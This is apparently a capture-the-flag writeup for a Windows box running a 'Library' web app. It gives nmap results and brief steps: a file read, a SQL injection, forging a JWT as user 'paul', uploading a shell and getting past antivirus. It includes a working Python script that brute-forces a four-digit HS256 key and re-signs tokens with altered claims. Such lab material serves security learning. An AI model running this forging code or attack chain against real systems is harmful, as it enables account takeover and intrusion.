Host is up (0.093s latency).
Not shown: 65520 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
| ssh-hostkey:
|   2048 9d:d0:b8:81:55:54:ea:0f:89:b1:10:32:33:6a:a7:8f (RSA)
|   256 1f:2e:67:37:1a:b8:91:1d:5c:31:59:c7:c6:df:14:1d (ECDSA)
|_  256 30:9e:5d:12:e3:c6:b7:c6:3b:7e:1e:e7:89:7e:83:e4 (ED25519)
80/tcp    open  http
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-title: Library
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
443/tcp   open  https
| http-cookie-flags:
|   /:
|     PHPSESSID:
|       secure flag not set and HTTPS in use
|_      httponly flag not set
|_http-title: Library
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after:  2019-11-08T23:48:47
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
445/tcp   open  microsoft-ds
3306/tcp  open  mysql
5040/tcp  open  unknown
7680/tcp  open  pando-pub
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown

Host script results:
|_clock-skew: -1h00m00s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2022-04-12T22:28:53
|_  start_date: N/A

Nmap done: 1 IP address (1 host up) scanned in 166.32 seconds
There are an arbitrary file inclusion point and a SQL injection point.
On closer inspection of the code, it turns out to be only an arbitrary file read, not an inclusion. Next step.
Brute-forcing second-level directories, combined with the arbitrary file read, settled the approach: forge the paul user.
First, construct the JWT.
Then generate the candidate cookies and put them into Intruder to brute-force. (Since it is only four digits, I couldn't be bothered to write a script and just ran it through cmd5 by hand.)
(At first this kept failing; I reset the machine and then it worked.)
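The JWT step above, as an added example that is not part of this writeup (the author used Intruder and cmd5 by hand). It assumes the session cookie is an HS256 JWT, that the signing key is a four-digit number, and that the claim to change is a `username` field; the sample token is constructed inside the script, not captured from the target. It recovers the key by trying every candidate, then re-signs the token as paul.

```python
import base64
import hashlib
import hmac
import json


def b64url_encode(data: bytes) -> str:
    """Base64url without padding, as JWTs use it."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text: str) -> bytes:
    """Inverse of b64url_encode; re-adds the padding JWTs strip."""
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_hs256(header: dict, payload: dict, secret: str) -> str:
    """Build a compact HS256 JWT: b64url(header).b64url(payload).b64url(HMAC)."""
    signing_input = (
        b64url_encode(json.dumps(header, separators=(",", ":")).encode())
        + "."
        + b64url_encode(json.dumps(payload, separators=(",", ":")).encode())
    )
    mac = hmac.new(secret.encode(), signing_input.encode(), hashlib.sha256).digest()
    return signing_input + "." + b64url_encode(mac)


def verify_hs256(token: str, secret: str) -> bool:
    """Recompute the HMAC over header.payload and compare in constant time."""
    header_b64, payload_b64, sig_b64 = token.split(".")
    signing_input = f"{header_b64}.{payload_b64}".encode()
    expected = hmac.new(secret.encode(), signing_input, hashlib.sha256).digest()
    return hmac.compare_digest(expected, b64url_decode(sig_b64))


def crack_numeric_secret(token: str, digits: int = 4):
    """Try every numeric secret of up to `digits` digits.

    Both the zero-padded form ("0042") and the unpadded form ("42") are tried,
    because they are different keys. Returns the secret that validates the
    token, or None if no numeric secret matches.
    """
    for n in range(10 ** digits):
        padded = str(n).zfill(digits)
        for candidate in dict.fromkeys((padded, str(n))):  # dedupe when equal
            if verify_hs256(token, candidate):
                return candidate
    return None


def forge_token(token: str, secret: str, **claims) -> str:
    """Re-sign the captured token with the recovered secret after overriding claims."""
    header_b64, payload_b64, _ = token.split(".")
    header = json.loads(b64url_decode(header_b64))
    payload = json.loads(b64url_decode(payload_b64))
    payload.update(claims)
    return sign_hs256(header, payload, secret)


def claims_of(token: str) -> dict:
    """Decode the payload segment of a JWT without verifying it."""
    return json.loads(b64url_decode(token.split(".")[1]))


# Constructed sample (not captured from any target): a low-privilege session
# token signed with a hypothetical four-digit secret. The claim name
# "username" is an assumption, not something taken from the box.
SAMPLE_SECRET = "4921"
SAMPLE_TOKEN = sign_hs256(
    {"alg": "HS256", "typ": "JWT"},
    {"username": "guest", "role": "user"},
    SAMPLE_SECRET,
)


if __name__ == "__main__":
    secret = crack_numeric_secret(SAMPLE_TOKEN)
    print("recovered secret:", secret)
    forged = forge_token(SAMPLE_TOKEN, secret, username="paul")
    print("forged token:", forged)
    print("claims:", claims_of(forged), "valid:", verify_hs256(forged, secret))
```

Ten thousand HMAC-SHA256 computations finish in well under a second, so for a key this small there is no need for Intruder at all; the same loop generalizes to any short numeric or wordlist secret by swapping the candidate generator.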
Build a form, copy the cookie over, and upload directly.
Antivirus gets in the way here, but it is not a big deal; the usual shell_exec bypass does the trick.